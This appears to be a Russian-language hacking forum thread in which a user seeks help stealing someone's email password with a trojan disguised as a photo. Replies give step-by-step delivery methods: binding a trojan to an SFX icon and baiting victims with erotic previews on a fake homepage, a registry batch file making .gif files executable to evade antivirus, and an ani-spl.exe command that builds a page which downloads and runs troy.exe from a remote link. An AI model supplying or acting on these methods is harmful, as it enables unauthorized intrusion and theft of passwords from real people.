Народ, я вас уже всех наверное достал, но вот мне пришла идея, возможно ли создать страничку где нибудь, прикрепить туда фото, к нему трояна, чел его откроет и пароль к почте мой!!! Это вариант, если да помогите как его преобразовать в реальность!!!!!!
Нет....допустим фото ОТКРЫТЬ просто в браузере нельзя.....так как фото будет уже в формате еxе ... Есть простой вариант.... Что надо : Троян. (http://forum.antichat.ru/thread19273-xinch.html) Клей (http://forum.antichat.ru/thread23468-joiner.html) Иконка. (в инете поищи) Мозги. (свои ) Криптование (это сам добудешь) ТАк вот.самый простой способ,делаешь хом пагу девушки какой нить,компилишь троян ,склеиваешь с иконкой SFX архива (в инете точно есть,найти легко),SFX архив- у него картинки типа как у РАР или ЗИП ,там три книги и вроде желтыми буквами написано SFX... ПОтом делаешь какой нить раздел аля фотки,ставишь ссылки на свои трояны ,делаешь над каждым из одну превьюшку и к примеру пишешь.... 1.Эро фото ...Дальше будет превью (маленькая обнаженная фота)а ниже ссылка на архив. 2.Фотки с пляжа.... И так далее. А вообще качнуть троян способов куча. Главное иметь хорошие мозги.....это ребячество (украсть мыло).Чтобы по настоящему сыграть блеф..нужны очень очень хорошие мозги и знание психологии человека ! вот это я понимаю...СИ ! А если надо будет смастерить какую нить хопмагу...стучись.обсудим.
об этом варианте я уже давно читал и там нет нечего сложного просто надо создать трояна да и небольшой скрипт написать учи Js и все получится
RemaerD я сагласен с тобой самый простой вариант закинуть фотку а ниже ссылку (Вот еще новые фотки) и к этой ссылке путь к троянчеку которого ти предварительно закинеш на какой нить кусок диска в нете
Если ты это мне сказал ,то ты меня не понял....Он спросил о том как с помощью фоты и т.д. Я привел самый хороший способ впаривания трояна в плане ФОТ ! способов море,я ответил на его вопрос. Это не наезд....просто я думал что это мне
Ну фиговая или нет идея, просто реально уже скоро месяц стукнет как я пытаюсь ломануть эти два долбаных мыла, уже все пробовал вот и кидаюсь на подобное, не получается ни трояна создать толком, ни брутить!!!! А про СИ, толку нет не подходит ни как!!!!!
Народ создаю трояна по SMTP, Где серве пишу сервак Topmail.kz, потом вписываю адреса, которые там-же, Делаю узнать и тест, пишет, что все гуд. Потом делаю скомплектовать. Не в функции не куда не залазия, он создает трояна. Потом склеиваю с прогами, с любыми и с иконками и без, что-то клеит, но когда начинаю проверять на вирус пишет, что есть вирус Троян и т.п.
Меняем расширение трояна на расширение какойнить картинки (например gif) далее пипшим батник который в реестре сделает расширение gif исполняемым файлом! Осталось впарить картинку и бат файл! не то не другое антивирь не спалит!
Начинающим =) Я надеюсь не надо объяснять что запускаем через "cmd" ...А то читаешь форум такие вопросы задают ваще пи***ц ... Собирается он так: скачиваем ani-spl.rar запускаем с параметрами : Code: ani-spl.exe name http:\\линк\troy.exe в результате получаем два файла - name.html и name.ani, zip'уем , заливаем и распаковываем на сайт - код из name.html можно просто вставить в любую страничку или так вешаем ... Необходимо чтобы с name.html в одной папке был и name.ani- он и скачает и запустит на комп жертвы troy.exe *недостатки: работает только с IE + *не работает в SP2 * Вот пример - закачивает криптованный 8_X_control,там пассы от ISQ,от FTP,чё ещё надо,трой думаю сами найдёте,его как грязи в рунете ... P.S. Всё вам разжовывать надо ...